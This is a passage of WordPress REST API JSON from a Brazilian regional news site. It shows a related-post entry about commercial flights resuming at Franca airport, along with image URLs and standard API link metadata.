https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/OLIMPIA_2024-12-22_19-44-58_jpg_2024-12-22_19-44-58.webp.webp?fit=1200%2C640&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":78879,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/12\/10\/aeroportos-do-interior-de-sp-comecam-a-operar-voos-comerciais-veja-quando\/","url_meta":{"origin":77817,"position":5},"title":"Aeroportos do interior de SP come\u00e7am a operar voos comerciais; Veja quando","author":"ismaelcolosi.com.br","date":"10 de December de 2024","format":false,"excerpt":"O aeroporto de Franca, cidade a 90 quil\u00f4metros de Ribeir\u00e3o Preto, vai retomar os voos comerciais na pr\u00f3xima segunda-feira (16). Em novembro deste ano, a FAB (For\u00e7a A\u00e9rea Brasileira) esteve no local para realizar testes t\u00e9cnicos. A Azul Linhas A\u00e9reas ser\u00e1 a empresa respons\u00e1vel pela opera\u00e7\u00e3o dos voos regulares que\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/aeroportofranca-1_2024-12-10_15-26-18_jpeg_2024-12-10_15-26-18.webp.webp?fit=1200%2C900&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/aeroportofranca-1_2024-12-10_15-26-18_jpeg_2024-12-10_15-26-18.webp.webp?fit=1200%2C900&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/aeroportofranca-1_2024-12-10_15-26-18_jpeg_2024-12-10_15-26-18.webp.webp?fit=1200%2C900&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/aeroportofranca-1_2024-12-10_15-26-18_jpeg_2024-12-10_15-26-18.webp.webp?fit=1200%2C900&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/aeroportofranca-1_2024-12-10_15-26-18_jpeg_2024-12-10_15-26-18.webp.webp?fit=1200%2C900&ssl=1&resize=1050%2C600 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pfMlyK-kf7","_links":{"self":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/posts\/77817","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=77817"}],"version-history":[{"count":0,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/posts\/77817\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/media\/77818"}],"wp:attachment":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=77817"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=77817"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=77817"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}